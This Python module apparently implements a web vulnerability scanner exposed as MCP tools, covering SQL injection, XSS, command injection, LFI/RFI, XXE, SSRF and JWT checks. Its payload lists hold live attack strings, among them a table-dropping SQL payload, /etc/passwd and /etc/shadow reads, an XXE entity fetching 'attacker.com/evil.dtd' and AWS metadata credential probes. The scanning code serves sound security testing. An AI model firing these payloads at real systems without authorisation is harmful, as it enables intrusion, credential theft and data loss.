"""
Vulnerability assessment and specific security testing tools.
"""
import asyncio
import json
import re
import base64
from typing import Any, Dict, List, Optional, Set
from urllib.parse import urlparse, parse_qs
import aiohttp
from mcp.types import Tool
from .base import BaseTools
from ..utils import validate_target, run_command_async, get_timestamp
class VulnerabilityTools(BaseTools):
"""Vulnerability assessment and security testing tools."""
def get_tools(self) -> List[Tool]:
    """Build the catalogue of vulnerability-testing tools.

    Returns:
        One ``Tool`` per test, each carrying its name, a one-line
        description and the JSON Schema of the arguments it accepts.
    """

    # Small schema builders; each call returns a fresh dict so no two tools
    # share a mutable property definition.
    def text(description: str) -> Dict[str, Any]:
        return {"type": "string", "description": description}

    def text_list(description: str) -> Dict[str, Any]:
        return {"type": "array", "items": {"type": "string"}, "description": description}

    def choice(options: List[str], default: str) -> Dict[str, Any]:
        return {"type": "string", "enum": options, "default": default}

    def integer(default: int, description: str) -> Dict[str, Any]:
        return {"type": "integer", "default": default, "description": description}

    def mapping(description: str) -> Dict[str, Any]:
        return {"type": "object", "description": description}

    def schema(required: List[str], **properties: Dict[str, Any]) -> Dict[str, Any]:
        # Keyword order is preserved, so properties appear as written below.
        return {"type": "object", "properties": properties, "required": required}

    # (tool name, description, input schema)
    catalogue = [
        (
            "sql_injection_test",
            "Test for SQL injection vulnerabilities",
            schema(
                ["url"],
                url=text("Target URL"),
                parameters=text_list("Parameters to test"),
                method=choice(["GET", "POST"], "GET"),
                cookie=text("Authentication cookie"),
                blind_test={
                    "type": "boolean",
                    "default": True,
                    "description": "Include blind SQL injection tests",
                },
            ),
        ),
        (
            "xss_test",
            "Test for Cross-Site Scripting (XSS) vulnerabilities",
            schema(
                ["url"],
                url=text("Target URL"),
                parameters=text_list("Parameters to test"),
                payload_type=choice(["reflected", "stored", "dom", "all"], "all"),
                cookie=text("Authentication cookie"),
            ),
        ),
        (
            "command_injection_test",
            "Test for command injection vulnerabilities",
            schema(
                ["url"],
                url=text("Target URL"),
                parameters=text_list("Parameters to test"),
                os_type=choice(["unix", "windows", "both"], "both"),
            ),
        ),
        (
            "lfi_rfi_test",
            "Test for Local and Remote File Inclusion vulnerabilities",
            schema(
                ["url"],
                url=text("Target URL"),
                parameters=text_list("Parameters to test"),
                test_type=choice(["lfi", "rfi", "both"], "both"),
            ),
        ),
        (
            "xxe_test",
            "Test for XML External Entity (XXE) vulnerabilities",
            schema(
                ["url"],
                url=text("Target URL"),
                xml_endpoints=text_list("XML endpoints to test"),
            ),
        ),
        (
            "ssrf_test",
            "Test for Server-Side Request Forgery (SSRF) vulnerabilities",
            schema(
                ["url"],
                url=text("Target URL"),
                parameters=text_list("Parameters to test"),
                callback_url=text("Callback URL for out-of-band testing"),
            ),
        ),
        (
            "idor_test",
            "Test for Insecure Direct Object Reference (IDOR) vulnerabilities",
            schema(
                ["url"],
                url=text("Target URL"),
                id_parameters=text_list("ID parameters to test"),
                test_range=integer(100, "Range of IDs to test"),
            ),
        ),
        (
            "csrf_test",
            "Test for Cross-Site Request Forgery (CSRF) vulnerabilities",
            schema(
                ["url"],
                url=text("Target URL"),
                forms=text_list("Form URLs to test"),
                cookie=text("Authentication cookie"),
            ),
        ),
        (
            "authentication_bypass",
            "Test for authentication bypass vulnerabilities",
            schema(
                ["login_url"],
                login_url=text("Login endpoint URL"),
                protected_url=text("Protected resource URL"),
                username_field={"type": "string", "default": "username"},
                password_field={"type": "string", "default": "password"},
            ),
        ),
        (
            "privilege_escalation_test",
            "Test for privilege escalation vulnerabilities",
            schema(
                ["base_url"],
                base_url=text("Base application URL"),
                low_priv_cookie=text("Low privilege user cookie"),
                admin_endpoints=text_list("Admin endpoints to test"),
            ),
        ),
        (
            "jwt_security_test",
            "Test JWT (JSON Web Token) security vulnerabilities",
            schema(
                ["jwt_token"],
                jwt_token=text("JWT token to analyze"),
                target_url=text("Target URL that uses JWT"),
            ),
        ),
        (
            "session_management_test",
            "Test session management security",
            schema(
                ["login_url"],
                login_url=text("Login endpoint"),
                logout_url=text("Logout endpoint"),
                session_cookie=text("Session cookie name"),
                credentials=mapping("Test credentials"),
            ),
        ),
        (
            "race_condition_test",
            "Test for race condition vulnerabilities",
            schema(
                ["url"],
                url=text("Target URL"),
                concurrent_requests=integer(10, "Number of concurrent requests"),
                request_data=mapping("Request data to send"),
            ),
        ),
        (
            "business_logic_test",
            "Test for business logic vulnerabilities",
            schema(
                ["workflow_urls"],
                workflow_urls=text_list("Workflow URLs to test"),
                test_scenarios=text_list("Business logic scenarios"),
            ),
        ),
        (
            "deserialization_test",
            "Test for insecure deserialization vulnerabilities",
            schema(
                ["url"],
                url=text("Target URL"),
                serialization_type=choice(["java", "php", "python", "dotnet", "auto"], "auto"),
            ),
        ),
    ]

    return [
        Tool(name=tool_name, description=summary, inputSchema=input_schema)
        for tool_name, summary, input_schema in catalogue
    ]
async def sql_injection_test(
    self,
    url: str,
    parameters: Optional[List[str]] = None,
    method: str = "GET",
    cookie: Optional[str] = None,
    blind_test: bool = True
) -> str:
    """Probe request parameters for error-based and time-based SQL injection.

    Every payload is sent once per parameter.  A finding is recorded when the
    response body contains a database error signature or, for the delay
    payloads added by ``blind_test``, when the response is slower than the
    slowest non-delay response for the same parameter by roughly the
    injected delay.

    Args:
        url: Target URL; its network location must pass the allowlist check.
        parameters: Parameter names to test.  When empty, the names found in
            the URL's query string are used.
        method: "GET" injects into the query string; any other value sends
            the payload as POST form data containing only the tested field.
        cookie: Optional value for the ``Cookie`` request header.
        blind_test: Also send time-delay payloads and evaluate timing.

    Returns:
        The formatted result report, or a short plain-text message when the
        target is not allowed or there is nothing to test.
    """
    parsed_url = urlparse(url)
    domain = parsed_url.netloc
    if not self.check_target_allowed(domain):
        return f"Target {domain} is not allowed for scanning"

    results = {
        "url": url,
        "timestamp": get_timestamp(),
        "method": method,
        "vulnerabilities": [],
        "tested_parameters": [],
        "payloads_used": [],
        "errors": []
    }

    # NOTE(review): "'; DROP TABLE users--" is destructive if the target is
    # actually injectable and supports stacked queries; consider removing it
    # for anything other than disposable test environments.
    sql_payloads = [
        "'", "\"", "1'", "1\"",
        "' OR '1'='1", "\" OR \"1\"=\"1",
        "' OR 1=1--", "\" OR 1=1--",
        "'; DROP TABLE users--",
        "' UNION SELECT NULL--",
        "1' AND 1=1--", "1\" AND 1=1--",
        "1' AND 1=2--", "1\" AND 1=2--"
    ]

    # Each of these asks the database to pause for `blind_delay` seconds.
    blind_delay = 5.0
    blind_payloads = [
        "1'; WAITFOR DELAY '00:00:05'--",
        "1\"; WAITFOR DELAY '00:00:05'--",
        "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
        "1\" AND (SELECT * FROM (SELECT(SLEEP(5)))a)--"
    ]
    delay_payloads = set()
    if blind_test:
        sql_payloads.extend(blind_payloads)
        delay_payloads = set(blind_payloads)
    results["payloads_used"] = sql_payloads

    # Fall back to the parameters present in the URL itself.
    if not parameters:
        parameters = list(parse_qs(parsed_url.query).keys())
    if not parameters:
        return "No parameters found to test"
    results["tested_parameters"] = parameters

    headers = {}
    if cookie:
        headers["Cookie"] = cookie

    send_as_get = method.upper() == "GET"
    # aiohttp expects a ClientTimeout; bare numbers are accepted only for
    # backward compatibility.
    request_timeout = aiohttp.ClientTimeout(total=10)
    clock = asyncio.get_event_loop().time

    async with aiohttp.ClientSession() as session:
        for param in parameters:
            # Slowest ordinary response for this parameter; used as the
            # baseline so a generally slow endpoint is not reported as a
            # time-based injection.  Delay payloads come last in the list,
            # so the baseline is complete before it is needed.
            slowest_normal = 0.0
            for payload in sql_payloads:
                is_delay_payload = payload in delay_payloads
                try:
                    await self.rate_limit()
                    started = clock()
                    if send_as_get:
                        request = session.get(
                            self._inject_payload_url(url, param, payload),
                            headers=headers,
                            timeout=request_timeout,
                        )
                    else:
                        request = session.post(
                            url,
                            data={param: payload},
                            headers=headers,
                            timeout=request_timeout,
                        )
                    async with request as response:
                        finding = await self._analyze_sql_response(response, payload, param)
                    elapsed = clock() - started
                except Exception as exc:
                    # Best effort: keep scanning, but leave a trace of what
                    # failed instead of dropping it silently.
                    results["errors"].append({
                        "parameter": param,
                        "payload": payload,
                        "error": f"{type(exc).__name__}: {exc}"
                    })
                    continue

                if (
                    finding is None
                    and is_delay_payload
                    and elapsed - slowest_normal >= blind_delay * 0.9
                ):
                    finding = {
                        "type": "SQL Injection",
                        "parameter": param,
                        "payload": payload,
                        "method": "Time-based blind",
                        "evidence": (
                            f"Response took {elapsed:.2f}s versus "
                            f"{slowest_normal:.2f}s for non-delay payloads"
                        )
                    }
                if not is_delay_payload:
                    slowest_normal = max(slowest_normal, elapsed)
                if finding:
                    results["vulnerabilities"].append(finding)

    return self.format_result(results, f"SQL Injection Test Results for {url}")
async def xss_test(
    self,
    url: str,
    parameters: Optional[List[str]] = None,
    payload_type: str = "all",
    cookie: Optional[str] = None
) -> str:
    """Send XSS payloads through URL parameters and flag verbatim reflections.

    Each selected payload is injected into each parameter with a GET request;
    a finding is recorded when the payload appears unchanged in the response
    body.  Every payload category is exercised this same way: no stored
    content is revisited and no script is executed.

    Args:
        url: Target URL; its network location must pass the allowlist check.
        parameters: Parameter names to test.  When empty, the names found in
            the URL's query string are used.
        payload_type: "reflected", "stored", "dom" or "all".  An unknown
            value selects no payloads.
        cookie: Optional value for the ``Cookie`` request header.

    Returns:
        The formatted result report, or a short plain-text message when the
        target is not allowed or there is nothing to test.
    """
    parsed_url = urlparse(url)
    domain = parsed_url.netloc
    if not self.check_target_allowed(domain):
        return f"Target {domain} is not allowed for scanning"

    results = {
        "url": url,
        "timestamp": get_timestamp(),
        "payload_type": payload_type,
        "vulnerabilities": [],
        "tested_parameters": [],
        "payloads_used": [],
        "errors": []
    }

    xss_payloads = {
        "reflected": [
            "<script>alert('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            "<svg onload=alert('XSS')>",
            "javascript:alert('XSS')",
            "\"><script>alert('XSS')</script>",
            "'><script>alert('XSS')</script>"
        ],
        "stored": [
            "<script>alert('Stored XSS')</script>",
            "<img src=x onerror=alert('Stored XSS')>",
            "<iframe src=javascript:alert('Stored XSS')>",
            "<body onload=alert('Stored XSS')>"
        ],
        "dom": [
            "#<script>alert('DOM XSS')</script>",
            "javascript:alert('DOM XSS')",
            "data:text/html,<script>alert('DOM XSS')</script>"
        ]
    }

    if payload_type == "all":
        payloads = [item for group in xss_payloads.values() for item in group]
    else:
        payloads = xss_payloads.get(payload_type, [])
    results["payloads_used"] = payloads

    # Fall back to the parameters present in the URL itself.
    if not parameters:
        parameters = list(parse_qs(parsed_url.query).keys())
    if not parameters:
        return "No parameters found to test"
    results["tested_parameters"] = parameters

    headers = {}
    if cookie:
        headers["Cookie"] = cookie

    # aiohttp expects a ClientTimeout; bare numbers are accepted only for
    # backward compatibility.
    request_timeout = aiohttp.ClientTimeout(total=10)

    async with aiohttp.ClientSession() as session:
        for param in parameters:
            for payload in payloads:
                try:
                    await self.rate_limit()
                    test_url = self._inject_payload_url(url, param, payload)
                    async with session.get(
                        test_url, headers=headers, timeout=request_timeout
                    ) as response:
                        content = await response.text()
                except Exception as exc:
                    # Best effort: keep scanning, but record the failure
                    # instead of dropping it silently.
                    results["errors"].append({
                        "parameter": param,
                        "payload": payload,
                        "error": f"{type(exc).__name__}: {exc}"
                    })
                    continue

                # An unmodified echo means the value was not encoded on output.
                if payload in content:
                    results["vulnerabilities"].append({
                        "type": "XSS",
                        "parameter": param,
                        "payload": payload,
                        "method": "GET",
                        "evidence": "Payload reflected in response"
                    })

    return self.format_result(results, f"XSS Test Results for {url}")
async def command_injection_test(
    self,
    url: str,
    parameters: Optional[List[str]] = None,
    os_type: str = "both"
) -> str:
    """Inject shell metacharacter payloads into URL parameters.

    Each payload is sent with a GET request.  The response body and the time
    until the response headers arrived are handed to
    ``_detect_command_injection`` to decide whether to record a finding.

    Args:
        url: Target URL; its network location must pass the allowlist check.
        parameters: Parameter names to test.  When empty, the names found in
            the URL's query string are used.
        os_type: "unix" or "windows" selects one payload set; any other
            value (including "both") uses both sets.

    Returns:
        The formatted result report, or a short plain-text message when the
        target is not allowed or there is nothing to test.
    """
    parsed_url = urlparse(url)
    domain = parsed_url.netloc
    if not self.check_target_allowed(domain):
        return f"Target {domain} is not allowed for scanning"

    results = {
        "url": url,
        "timestamp": get_timestamp(),
        "os_type": os_type,
        "vulnerabilities": [],
        "tested_parameters": [],
        "payloads_used": [],
        "errors": []
    }

    unix_payloads = [
        "; ls", "| ls", "& ls", "`ls`", "$(ls)",
        "; cat /etc/passwd", "| cat /etc/passwd",
        "; sleep 5", "| sleep 5", "`sleep 5`",
        "; whoami", "| whoami", "`whoami`"
    ]
    windows_payloads = [
        "& dir", "| dir", "&& dir",
        "& type C:\\windows\\system32\\drivers\\etc\\hosts",
        "| type C:\\windows\\system32\\drivers\\etc\\hosts",
        "& ping -n 5 127.0.0.1",
        "| ping -n 5 127.0.0.1"
    ]

    if os_type == "unix":
        payloads = unix_payloads
    elif os_type == "windows":
        payloads = windows_payloads
    else:  # both
        payloads = unix_payloads + windows_payloads
    results["payloads_used"] = payloads

    # Fall back to the parameters present in the URL itself.
    if not parameters:
        parameters = list(parse_qs(parsed_url.query).keys())
    if not parameters:
        return "No parameters found to test"
    results["tested_parameters"] = parameters

    # aiohttp expects a ClientTimeout; bare numbers are accepted only for
    # backward compatibility.  15s leaves room for the 5s delay payloads.
    request_timeout = aiohttp.ClientTimeout(total=15)
    clock = asyncio.get_event_loop().time

    async with aiohttp.ClientSession() as session:
        for param in parameters:
            for payload in payloads:
                try:
                    await self.rate_limit()
                    test_url = self._inject_payload_url(url, param, payload)
                    started = clock()
                    async with session.get(test_url, timeout=request_timeout) as response:
                        # Time to response headers, measured before the body
                        # is read.
                        response_time = clock() - started
                        content = await response.text()
                except Exception as exc:
                    # Best effort: keep scanning, but record the failure
                    # instead of dropping it silently.
                    results["errors"].append({
                        "parameter": param,
                        "payload": payload,
                        "error": f"{type(exc).__name__}: {exc}"
                    })
                    continue

                if self._detect_command_injection(content, payload, response_time):
                    results["vulnerabilities"].append({
                        "type": "Command Injection",
                        "parameter": param,
                        "payload": payload,
                        "response_time": response_time,
                        "evidence": "Command injection detected"
                    })

    return self.format_result(results, f"Command Injection Test Results for {url}")
async def lfi_rfi_test(
    self,
    url: str,
    parameters: Optional[List[str]] = None,
    test_type: str = "both"
) -> str:
    """Inject file-path and remote-URL payloads into URL parameters.

    Each payload is sent with a GET request and the response body is handed
    to ``_detect_file_inclusion``.  A finding is labelled "LFI" when the
    payload comes from the local-file list and "RFI" otherwise.

    Args:
        url: Target URL; its network location must pass the allowlist check.
        parameters: Parameter names to test.  When empty, the names found in
            the URL's query string are used.
        test_type: "lfi" or "rfi" selects one payload set; any other value
            (including "both") uses both sets.

    Returns:
        The formatted result report, or a short plain-text message when the
        target is not allowed or there is nothing to test.
    """
    parsed_url = urlparse(url)
    domain = parsed_url.netloc
    if not self.check_target_allowed(domain):
        return f"Target {domain} is not allowed for scanning"

    results = {
        "url": url,
        "timestamp": get_timestamp(),
        "test_type": test_type,
        "vulnerabilities": [],
        "tested_parameters": [],
        "payloads_used": [],
        "errors": []
    }

    lfi_payloads = [
        "../../../etc/passwd",
        "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
        "/etc/passwd",
        "C:\\windows\\system32\\drivers\\etc\\hosts",
        "../../../etc/shadow",
        "../../../proc/version",
        "../../../etc/hostname"
    ]
    # RFI payloads (use carefully): a vulnerable target will fetch these URLs.
    rfi_payloads = [
        "http://example.com/malicious.txt",
        "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt"
    ]

    if test_type == "lfi":
        payloads = lfi_payloads
    elif test_type == "rfi":
        payloads = rfi_payloads
    else:  # both
        payloads = lfi_payloads + rfi_payloads
    results["payloads_used"] = payloads

    # Fall back to the parameters present in the URL itself.
    if not parameters:
        parameters = list(parse_qs(parsed_url.query).keys())
    if not parameters:
        return "No parameters found to test"
    results["tested_parameters"] = parameters

    # aiohttp expects a ClientTimeout; bare numbers are accepted only for
    # backward compatibility.
    request_timeout = aiohttp.ClientTimeout(total=10)

    async with aiohttp.ClientSession() as session:
        for param in parameters:
            for payload in payloads:
                try:
                    await self.rate_limit()
                    test_url = self._inject_payload_url(url, param, payload)
                    async with session.get(test_url, timeout=request_timeout) as response:
                        content = await response.text()
                except Exception as exc:
                    # Best effort: keep scanning, but record the failure
                    # instead of dropping it silently.
                    results["errors"].append({
                        "parameter": param,
                        "payload": payload,
                        "error": f"{type(exc).__name__}: {exc}"
                    })
                    continue

                if self._detect_file_inclusion(content, payload):
                    results["vulnerabilities"].append({
                        "type": "LFI" if payload in lfi_payloads else "RFI",
                        "parameter": param,
                        "payload": payload,
                        "evidence": "File inclusion detected"
                    })

    return self.format_result(results, f"File Inclusion Test Results for {url}")
async def xxe_test(
    self,
    url: str,
    xml_endpoints: Optional[List[str]] = None
) -> str:
    """POST XML documents with external entities and look for leaked content.

    Every payload is posted to every endpoint with
    ``Content-Type: application/xml``; the response body is handed to
    ``_detect_xxe``.

    Args:
        url: Target URL; its network location must pass the allowlist check.
            Used as the only endpoint when ``xml_endpoints`` is empty.
        xml_endpoints: Endpoints to post to.  Each one is checked against the
            allowlist individually; endpoints that fail the check are not
            contacted and are listed under ``skipped_endpoints``.

    Returns:
        The formatted result report, or a short plain-text message when the
        target is not allowed.
    """
    parsed_url = urlparse(url)
    domain = parsed_url.netloc
    if not self.check_target_allowed(domain):
        return f"Target {domain} is not allowed for scanning"

    results = {
        "url": url,
        "timestamp": get_timestamp(),
        "vulnerabilities": [],
        "tested_endpoints": [],
        "skipped_endpoints": [],
        "payloads_used": [],
        "errors": []
    }

    xml_prolog = '<?xml version="1.0" encoding="UTF-8"?>\n'
    xxe_payloads = [
        xml_prolog
        + '<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
        + '<root>&xxe;</root>',
        xml_prolog
        + '<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">]>\n'
        + '<root>&xxe;</root>',
        xml_prolog
        + '<!DOCTYPE root [<!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd"> %ext;]>\n'
        + '<root></root>',
        xml_prolog
        + '<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>\n'
        + '<root>&xxe;</root>'
    ]
    results["payloads_used"] = xxe_payloads

    if not xml_endpoints:
        xml_endpoints = [url]

    # The allowlist check above only covers `url`; caller-supplied endpoints
    # may point at other hosts and must be vetted as well.
    allowed_endpoints = []
    for endpoint in xml_endpoints:
        if self.check_target_allowed(urlparse(endpoint).netloc):
            allowed_endpoints.append(endpoint)
        else:
            results["skipped_endpoints"].append(endpoint)
    results["tested_endpoints"] = allowed_endpoints

    headers = {"Content-Type": "application/xml"}
    # aiohttp expects a ClientTimeout; bare numbers are accepted only for
    # backward compatibility.
    request_timeout = aiohttp.ClientTimeout(total=10)

    async with aiohttp.ClientSession() as session:
        for endpoint in allowed_endpoints:
            for payload in xxe_payloads:
                try:
                    await self.rate_limit()
                    async with session.post(
                        endpoint, data=payload, headers=headers, timeout=request_timeout
                    ) as response:
                        content = await response.text()
                except Exception as exc:
                    # Best effort: keep scanning, but record the failure
                    # instead of dropping it silently.
                    results["errors"].append({
                        "endpoint": endpoint,
                        "payload": payload[:100] + "...",
                        "error": f"{type(exc).__name__}: {exc}"
                    })
                    continue

                if self._detect_xxe(content):
                    results["vulnerabilities"].append({
                        "type": "XXE",
                        "endpoint": endpoint,
                        # Truncated to keep the report readable.
                        "payload": payload[:100] + "...",
                        "evidence": "XXE vulnerability detected"
                    })

    return self.format_result(results, f"XXE Test Results for {url}")
async def ssrf_test(
    self,
    url: str,
    parameters: Optional[List[str]] = None,
    callback_url: Optional[str] = None
) -> str:
    """Inject internal and metadata URLs into parameters to probe for SSRF.

    Each payload is sent with a GET request.  The response body and the time
    until the response headers arrived are handed to ``_detect_ssrf``.

    Args:
        url: Target URL; its network location must pass the allowlist check.
        parameters: Parameter names to test.  When empty, the names found in
            the URL's query string are used.
        callback_url: Optional extra payload.  It is only injected; this
            method does not check whether the callback was received.

    Returns:
        The formatted result report, or a short plain-text message when the
        target is not allowed or there is nothing to test.
    """
    parsed_url = urlparse(url)
    domain = parsed_url.netloc
    if not self.check_target_allowed(domain):
        return f"Target {domain} is not allowed for scanning"

    results = {
        "url": url,
        "timestamp": get_timestamp(),
        "vulnerabilities": [],
        "tested_parameters": [],
        "payloads_used": [],
        "errors": []
    }

    ssrf_payloads = [
        "http://127.0.0.1:80",
        "http://localhost:80",
        "http://169.254.169.254/",  # AWS metadata
        "http://169.254.169.254/latest/meta-data/",
        "file:///etc/passwd",
        "gopher://127.0.0.1:3306/",
        "dict://127.0.0.1:6379/"
    ]
    if callback_url:
        ssrf_payloads.append(callback_url)
    results["payloads_used"] = ssrf_payloads

    # Fall back to the parameters present in the URL itself.
    if not parameters:
        parameters = list(parse_qs(parsed_url.query).keys())
    if not parameters:
        return "No parameters found to test"
    results["tested_parameters"] = parameters

    # aiohttp expects a ClientTimeout; bare numbers are accepted only for
    # backward compatibility.
    request_timeout = aiohttp.ClientTimeout(total=15)
    clock = asyncio.get_event_loop().time

    async with aiohttp.ClientSession() as session:
        for param in parameters:
            for payload in ssrf_payloads:
                try:
                    await self.rate_limit()
                    test_url = self._inject_payload_url(url, param, payload)
                    started = clock()
                    async with session.get(test_url, timeout=request_timeout) as response:
                        # Time to response headers, measured before the body
                        # is read.
                        response_time = clock() - started
                        content = await response.text()
                except Exception as exc:
                    # Best effort: keep scanning, but record the failure
                    # instead of dropping it silently.
                    results["errors"].append({
                        "parameter": param,
                        "payload": payload,
                        "error": f"{type(exc).__name__}: {exc}"
                    })
                    continue

                if self._detect_ssrf(content, payload, response_time):
                    results["vulnerabilities"].append({
                        "type": "SSRF",
                        "parameter": param,
                        "payload": payload,
                        "response_time": response_time,
                        "evidence": "SSRF vulnerability detected"
                    })

    return self.format_result(results, f"SSRF Test Results for {url}")
async def jwt_security_test(
    self,
    jwt_token: str,
    target_url: Optional[str] = None
) -> str:
    """Statically analyse a JWT for common weaknesses.

    The token is decoded without trusting its signature and checked for:
    the ``none`` algorithm, an HMAC signature produced with a well-known
    weak secret, RS256 (potential HS256 key-confusion), an expired ``exp``
    claim, and a missing or malformed ``exp`` claim.

    The weak-secret check recomputes the HMAC directly, so it covers HS256,
    HS384 and HS512 and is not affected by claim validation (an expired
    token signed with a weak secret is still reported).

    Args:
        jwt_token: Compact-serialised JWT (``header.payload.signature``).
        target_url: Accepted for interface compatibility; not used by this
            analysis.

    Returns:
        The formatted analysis report, or "Invalid JWT token format" when
        the token does not consist of exactly three dot-separated parts.
        Decoding failures are reported under the ``error`` key.
    """
    import hashlib
    import hmac
    import time

    results = {
        # Only a prefix is echoed so the full credential is not re-exposed.
        "jwt_token": jwt_token[:20] + "...",
        "timestamp": get_timestamp(),
        "vulnerabilities": [],
        "token_analysis": {}
    }

    def b64url_decode(segment: str) -> bytes:
        # JWT segments omit base64 padding; restore exactly what is missing.
        return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

    try:
        parts = jwt_token.split('.')
        if len(parts) != 3:
            return "Invalid JWT token format"

        header = json.loads(b64url_decode(parts[0]))
        payload = json.loads(b64url_decode(parts[1]))
        if not isinstance(header, dict) or not isinstance(payload, dict):
            raise ValueError("JWT header and payload must be JSON objects")

        algorithm = header.get("alg")
        results["token_analysis"] = {
            "header": header,
            "payload": payload,
            "algorithm": algorithm,
            "token_type": header.get("typ")
        }
        # Guard against a non-string "alg" so the string checks cannot raise.
        alg_name = algorithm if isinstance(algorithm, str) else ""

        vulnerabilities = []

        # 1. None algorithm attack (case variants such as "None" are used to
        #    slip past naive filters, so compare case-insensitively).
        if alg_name.lower() == "none":
            vulnerabilities.append({
                "type": "None Algorithm",
                "description": "JWT uses 'none' algorithm, allowing unsigned tokens",
                "severity": "High"
            })

        # 2. Weak secret (HMAC algorithms only)
        digest_by_alg = {
            "HS256": hashlib.sha256,
            "HS384": hashlib.sha384,
            "HS512": hashlib.sha512
        }
        digest = digest_by_alg.get(alg_name)
        if digest is not None:
            try:
                signature = b64url_decode(parts[2])
            except ValueError:
                # Undecodable signature: nothing to compare against.
                signature = None
            if signature is not None:
                signing_input = f"{parts[0]}.{parts[1]}".encode("ascii")
                weak_secrets = ["secret", "password", "123456", "admin", "test"]
                for secret in weak_secrets:
                    expected = hmac.new(secret.encode("utf-8"), signing_input, digest).digest()
                    if hmac.compare_digest(expected, signature):
                        vulnerabilities.append({
                            "type": "Weak Secret",
                            "description": f"JWT can be decoded with weak secret: {secret}",
                            "severity": "Critical"
                        })
                        break

        # 3. Algorithm confusion (RS256 to HS256)
        if alg_name == "RS256":
            vulnerabilities.append({
                "type": "Algorithm Confusion",
                "description": "RS256 token might be vulnerable to HS256 confusion attack",
                "severity": "Medium"
            })

        # 4./5. Expiration claim: missing, malformed or already in the past
        if "exp" not in payload:
            vulnerabilities.append({
                "type": "No Expiration",
                "description": "JWT token has no expiration claim",
                "severity": "Medium"
            })
        else:
            expiry = payload["exp"]
            is_number = isinstance(expiry, (int, float)) and not isinstance(expiry, bool)
            if not is_number:
                vulnerabilities.append({
                    "type": "Invalid Expiration",
                    "description": "JWT 'exp' claim is not a numeric timestamp",
                    "severity": "Medium"
                })
            elif expiry < time.time():
                vulnerabilities.append({
                    "type": "Expired Token",
                    "description": "JWT token has expired",
                    "severity": "Low"
                })

        results["vulnerabilities"] = vulnerabilities
    except Exception as e:
        results["error"] = f"Failed to analyze JWT: {str(e)}"

    return self.format_result(results, "JWT Security Analysis")
# Helper methods
def _inject_payload_url(self, url: str, param: str, payload: str) -> str:
"""Inject payload into URL parameter."""
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
parsed = urlparse(url)
query_params = parse_qs(parsed.query)
query_params[param] = [payload]
new_query = urlencode(query_params, doseq=True)
return urlunparse((
parsed.scheme, parsed.netloc, parsed.path,
parsed.params, new_query, parsed.fragment
))
async def _analyze_sql_response(self, response, payload: str, param: str) -> Optional[Dict[str, Any]]:
"""Analyze response for SQL injection indicators."""
content = await response.text()
# SQL error patterns
sql_errors = [
"sql syntax", "mysql_fetch", "ora-", "postgresql",
"sqlite_", "sqlserver", "syntax error", "quoted string",
"mysql_num_rows", "mysql_result", "pg_query",
"sqlite3.OperationalError", "ORA-00933"
]
for error in sql_errors:
if error.lower() in content.lower():
return {
"type": "SQL Injection",
"parameter": param,
"payload": payload,
"method": "Error-based",
"evidence": f"SQL error found: {error}"
}
# Time-based detection
if "sleep" in payload.lower() or "waitfor" in payload.lower():
# This would need proper timing analysis
pass
return None
def _detect_command_injection(self, content: str, payload: str, response_time: float) -> bool:
"""Detect command injection indicators."""
# Command output patterns
command_patterns = [
"root:", "bin/", "/usr/", "windows", "system32",
"passwd", "shadow", "hosts", "config"
]
for pattern in command_patterns:
if pattern in content.lower():
return True
# Time-based detection
if "sleep" in payload.lower() and response_time > 4:
return True
return False
def _detect_file_inclusion(self, content: str, payload: str) -> bool:
"""Detect file inclusion indicators."""
file_patterns = [
"root:x:", "daemon:", "www-data:", "nobody:",
"[boot loader]", "[operating systems]",
"# This file", "127.0.0.1", "localhost"
]
for pattern in file_patterns:
if pattern in content:
return True
return False
def _detect_xxe(self, content: str) -> bool:
"""Detect XXE vulnerability indicators."""
xxe_patterns = [
"root:x:", "daemon:", "www-data:",
"127.0.0.1", "localhost",
"file:///", "php://filter"
]
for pattern in xxe_patterns:
if pattern in content:
return True
return False
def _detect_ssrf(self, content: str, payload: str, response_time: float) -> bool:
"""Detect SSRF vulnerability indicators."""
# AWS metadata indicators
if "169.254.169.254" in payload:
aws_patterns = [
"ami-id", "instance-id", "security-groups",
"iam/security-credentials"
]
for pattern in aws_patterns:
if pattern in content:
return True
# Local service indicators
local_patterns = [
"apache", "nginx", "mysql", "redis",
"mongodb", "elasticsearch"
]
for pattern in local_patterns:
if pattern.lower() in content.lower():
return True
return False